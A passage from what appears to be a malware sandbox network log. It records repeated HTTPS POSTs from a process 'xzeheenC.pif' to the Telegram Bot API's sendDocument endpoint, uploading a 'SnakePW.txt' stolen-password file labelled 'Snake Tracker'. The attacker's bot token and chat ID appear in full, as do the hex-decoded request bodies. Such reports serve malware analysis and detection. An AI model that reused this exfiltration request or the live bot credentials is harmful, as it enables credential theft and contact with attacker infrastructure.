                                                                                                                      2024-12-18 15:17:21 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 36 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 34 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418684,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535040,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.549800149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:18 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f7b1dfba8e0
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:18 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 37 62 31 64 66 62 61 38 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f7b1dfba8e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:21 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:20 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:21 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 36 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 34 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418688,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535040,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.549812149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:22 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1facead84021
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:22 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 61 63 65 61 64 38 34 30 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1facead84021Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:28 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:28 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 34 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418753,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535048,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.549821149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d2fc2fa98
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 64 32 66 63 32 66 61 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f4d2fc2fa98Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:28 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:28 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 34 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418755,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535048,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.549829149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:30 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2000757d4a82
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:30 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 30 30 37 35 37 64 34 61 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2000757d4a82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:34 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 35 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418808,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535054,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.549830149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:30 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f6bdc044996
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:30 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 36 62 64 63 30 34 34 39 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f6bdc044996Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:34 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 35 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418809,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535054,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.549835149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d324b9521
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 64 33 32 34 62 39 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f4d324b9521Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:34 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 35 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418811,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535054,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.549846149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd203ec07e1085
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 33 65 63 30 37 65 31 30 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd203ec07e1085Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:36 UTC370INHTTP/1.1 429 Too Many Requests
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:36 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 111
                                                                                                                      Connection: close
                                                                                                                      Retry-After: 10
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
